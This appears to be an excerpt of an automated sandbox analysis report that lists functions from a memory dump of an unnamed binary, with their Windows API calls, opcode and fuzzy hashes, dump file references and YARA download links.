                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3382505437-0
                                                                                                                                  • Opcode ID: f44bd08fac9e8ff3bfe03b99149d5fb939c8bd34db3d76aa463ada5087d8e909
                                                                                                                                  • Instruction ID: 2ffdbc8ff94c837db70d88cf5c1f7e7eddd303526da32f98ba4fd26897c79ff1
                                                                                                                                  • Opcode Fuzzy Hash: f44bd08fac9e8ff3bfe03b99149d5fb939c8bd34db3d76aa463ada5087d8e909
                                                                                                                                  • Instruction Fuzzy Hash: E231D17190022EEBDF14CFA8DD4DA9E3BB5EB04359F204219F920AB2D1C7B09915DB91
                                                                                                                                  Function 00EDE9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00EDE9CD
                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EDE9EA
                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EDEA22
                                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00EDEA48
                                                                                                                                  • _wcsstr.LIBCMT ref: 00EDEA52
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3902887630-0
                                                                                                                                  • Opcode ID: fc4369c57635b7285add3995c3762437ff463f532b106883a7625b9a94cbb8b6
                                                                                                                                  • Instruction ID: 2f5f9aa968f6641e2d4302a8a25f7fd5263be29d00be731a3fe691b398ad722f
                                                                                                                                  • Opcode Fuzzy Hash: fc4369c57635b7285add3995c3762437ff463f532b106883a7625b9a94cbb8b6
                                                                                                                                  • Instruction Fuzzy Hash: B2214C31204204BAEB25BB29DC49E7F7FE9DF45710F00802FF809EE351EA61DC429290
                                                                                                                                  Function 00F0DC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F0DCC0
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F0DCE4
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F0DCFC
                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00F0DD24
                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00EF407D,00000000), ref: 00F0DD42
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2294984445-0
                                                                                                                                  • Opcode ID: 0ebd95b18e011e0e564b20ac51beeda670c49ca733e37c189538f017377161cd
                                                                                                                                  • Instruction ID: 21c7a78d7ce2b19c726ebe8cc34a6a0b232fc2a0cf6bb7d27daf0f9c6ea9006a
                                                                                                                                  • Opcode Fuzzy Hash: 0ebd95b18e011e0e564b20ac51beeda670c49ca733e37c189538f017377161cd
                                                                                                                                  • Instruction Fuzzy Hash: DB21CF71A01216AFCB209FB89C48B6A7BA4FB45374B244724F936C61E0D3709821FB80
                                                                                                                                  Function 00EDCA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EDCA86
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EDCAB8
                                                                                                                                  • __itow.LIBCMT ref: 00EDCAD0
                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EDCAF6
                                                                                                                                  • __itow.LIBCMT ref: 00EDCB07
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$__itow$_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2983881199-0
                                                                                                                                  • Opcode ID: c85e5935403448caf0c251416d04dc4a3356945b4ad342ed9f05394af1ce1d67
                                                                                                                                  • Instruction ID: efed480fac27336dce5ab7a78885b1f1f5f8c6c7d0f11c00f7e6ba5754e2868e
                                                                                                                                  • Opcode Fuzzy Hash: c85e5935403448caf0c251416d04dc4a3356945b4ad342ed9f05394af1ce1d67
                                                                                                                                  • Instruction Fuzzy Hash: 6521A7767002087BDB21EAA48D46EDE7AA9DF49790F206426F906F7281D661CD07C7A1
                                                                                                                                  Function 00EF89AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsWindow.USER32(00000000), ref: 00EF89CE
                                                                                                                                  • GetForegroundWindow.USER32 ref: 00EF89E5
                                                                                                                                  • GetDC.USER32(00000000), ref: 00EF8A21
                                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00EF8A2D
                                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00EF8A68
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4156661090-0
                                                                                                                                  • Opcode ID: 2b33bd9cbba67a39bcccf6586bb0a1f682ca5c254b051fa44d48409aaf88d199
                                                                                                                                  • Instruction ID: 01811ef50a3296f41aa774fcf5b4b2652a7dfe4759b9e886b2cbc85d365dd1eb
                                                                                                                                  • Opcode Fuzzy Hash: 2b33bd9cbba67a39bcccf6586bb0a1f682ca5c254b051fa44d48409aaf88d199
                                                                                                                                  • Instruction Fuzzy Hash: 40219675A00208AFDB10EF65DD85AAA7BF9EF48301F148479E949A7351CB70AD01DBA0
                                                                                                                                  Function 00EBB58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EBB5EB
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00EBB5FA
                                                                                                                                  • BeginPath.GDI32(?), ref: 00EBB611
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00EBB63B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3225163088-0
                                                                                                                                  • Opcode ID: ec44bdba79e0a006cbb82f4f19cff57163256f65f64916871a2da8d8e7df97a2
                                                                                                                                  • Instruction ID: 801169eb30c7d61b4b15802918cd7cd74435a4e234b21c306ae6a86fd4c72ec1
                                                                                                                                  • Opcode Fuzzy Hash: ec44bdba79e0a006cbb82f4f19cff57163256f65f64916871a2da8d8e7df97a2
                                                                                                                                  • Instruction Fuzzy Hash: 5221507080034DEFDB209F25EC457EA7BF9FB50329F185226E821A71A4D3F05896EB51
                                                                                                                                  Function 00EC2E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __calloc_crt.LIBCMT ref: 00EC2E81
                                                                                                                                  • CreateThread.KERNEL32(?,?,00EC2FB7,00000000,?,?), ref: 00EC2EC5
                                                                                                                                  • GetLastError.KERNEL32 ref: 00EC2ECF
                                                                                                                                  • _free.LIBCMT ref: 00EC2ED8
                                                                                                                                  • __dosmaperr.LIBCMT ref: 00EC2EE3
                                                                                                                                    • Part of subcall function 00EC889E: __getptd_noexit.LIBCMT ref: 00EC889E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2664167353-0
                                                                                                                                  • Opcode ID: 186f9511d0c601f5b2b7ddfe9214b4605acac1171c58f10c8710788ab36392ea
                                                                                                                                  • Instruction ID: 290cd6e3af893793776f5db926279238a8f1d5a66aed5e959735a21757a3ea99
                                                                                                                                  • Opcode Fuzzy Hash: 186f9511d0c601f5b2b7ddfe9214b4605acac1171c58f10c8710788ab36392ea
                                                                                                                                  • Instruction Fuzzy Hash: 0E118232104705AF9725AF659E41FAB7BE8EF44764B10242DFA54B6191EB3388128661
                                                                                                                                  Function 00EDB8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EDB903
                                                                                                                                  • GetLastError.KERNEL32(?,00EDB3CB,?,?,?), ref: 00EDB90D
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00EDB3CB,?,?,?), ref: 00EDB91C
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00EDB3CB), ref: 00EDB923
                                                                                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EDB93A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 883493501-0
                                                                                                                                  • Opcode ID: 75aacf8e87eaf744a1199536a1ddc2a2a58f9c33840f87975769262d5bca3b09
                                                                                                                                  • Instruction ID: cc434949b2b699fd7bf7779abc0e9c7497bd8704d505cfa62bc8a22566a4d0c5
                                                                                                                                  • Opcode Fuzzy Hash: 75aacf8e87eaf744a1199536a1ddc2a2a58f9c33840f87975769262d5bca3b09
                                                                                                                                  • Instruction Fuzzy Hash: 00016D71201288BFDB214FA5DC88DAB3FADEF8A768B10002AF545D6250DB718C52EA60
                                                                                                                                  Function 00EE8355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EE8371
                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00EE837F
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EE8387
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00EE8391
                                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EE83CD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2833360925-0
                                                                                                                                  • Opcode ID: 84b5cb3765e5776ee37cfe61822730ead5e64fb29a520f199f6b49035090e1f9
                                                                                                                                  • Instruction ID: 579a9996c17d11af691e3e35e9823d27f9a4b489581e139396d28d29f47932f9
                                                                                                                                  • Opcode Fuzzy Hash: 84b5cb3765e5776ee37cfe61822730ead5e64fb29a520f199f6b49035090e1f9
                                                                                                                                  • Instruction Fuzzy Hash: 6E016931C0061DDBEF10AFE5EE49AEEBB78FB08B01F001052E545B2190CF709561DBA2
                                                                                                                                  Function 00EDA857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CLSIDFromProgID.COMBASE ref: 00EDA874
                                                                                                                                  • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00EDA88F
                                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 00EDA89D
                                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 00EDA8AD
                                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 00EDA8B9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3897988419-0
                                                                                                                                  • Opcode ID: 227306c1ec1d54ee1402faced7ec84a7534ef83b8ee59bd553866a9639d6a19d
                                                                                                                                  • Instruction ID: c97a1cecddfd22e89a8268b294455f52557a5a695f34087357827463ea73feb6
                                                                                                                                  • Opcode Fuzzy Hash: 227306c1ec1d54ee1402faced7ec84a7534ef83b8ee59bd553866a9639d6a19d
                                                                                                                                  • Instruction Fuzzy Hash: 05018F7A600208AFDB244F54DC48BAABBADEF44352F184035FD01E2250D771DE42ABA1
                                                                                                                                  Function 00EDB7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EDB806
                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EDB810
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EDB81F
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00EDB826
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EDB83C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 47921759-0
                                                                                                                                  • Opcode ID: 343515e4592646b65886ca6b99203d246e36cd61327a061aade6d41b116293d8
                                                                                                                                  • Instruction ID: 01ea25fcb23fc4b62bc0449e675d922d25ccae71b5d339b5fd6a3853459039c0
                                                                                                                                  • Opcode Fuzzy Hash: 343515e4592646b65886ca6b99203d246e36cd61327a061aade6d41b116293d8
                                                                                                                                  • Instruction Fuzzy Hash: E1F06875200308AFEB215FA5EC88E673B6DFF45755F10002AF541D7250D7609C53EB61
                                                                                                                                  Function 00EDB78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EDB7A5
                                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EDB7AF
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EDB7BE
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00EDB7C5
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EDB7DB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 47921759-0
                                                                                                                                  • Opcode ID: c3abe94979e0acd219c176b4603b4a9b76f1539bf48c0acb27069e2326070b31
                                                                                                                                  • Instruction ID: 745683e30f130eca7199904481b4656f91153d06efdad66104b7f0cf79517465
                                                                                                                                  • Opcode Fuzzy Hash: c3abe94979e0acd219c176b4603b4a9b76f1539bf48c0acb27069e2326070b31
                                                                                                                                  • Instruction Fuzzy Hash: 43F04F71240209AFEB205FA5EC89EAB3BACFF86759F10411BF941D7260DB609C439A61
                                                                                                                                  Function 00EDFA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00EDFA8F
                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00EDFAA6
                                                                                                                                  • MessageBeep.USER32(00000000), ref: 00EDFABE
                                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 00EDFADA
                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00EDFAF4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
